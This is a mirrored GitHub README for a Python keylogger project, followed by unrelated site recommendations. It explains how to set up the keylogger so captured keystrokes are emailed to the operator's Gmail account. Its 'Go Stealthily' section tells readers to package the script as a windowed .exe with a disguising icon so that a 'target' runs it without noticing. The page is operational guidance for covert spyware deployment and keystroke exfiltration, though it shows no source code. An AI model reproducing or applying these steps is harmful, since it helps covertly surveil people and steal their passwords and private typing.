Git Product home page Git Product logo

keylogger's Introduction

My Skills My Skills

Keylogger

A sample to show how keylogger can capture your keyboard, made by Python3.

GitHub followers GitHub forks GitHub watchers GitHub Repo stars

Installation

  1. pip3 install -r requirements.txt
  2. go to receive_email.py
  3. change main_email to your email address
  4. in password section enter your email address password you have just entered
  5. secondary_email does not effect in keylogger proccess and you recieve logs in sent box of email address you have entered in main_email section

your main_email must be a Gmail only
go to your google account settings and then go to security tab to enable Less secure app access

Go Stealthily

you can use a bug in pyinstaller and execute this script to .exe file format and when your target run .exe file, script will run on backgrough without being noticable. just use:

  1. first commit changes I mentioned in Installation instruction
  2. pip3 install pyinstaller
  3. pyinstaller --onefile --windowed --icon=PATH/OF/ICON.ico PATH/OF/keylogger.py

icon must be in .ico format

ATTENTION!

this script will not work before or after execution on Windows 7 until you use python3.8.6 or less for downloading requirements and execution

keylogger's People

Contributors

errixed avatar

Stargazers

 avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.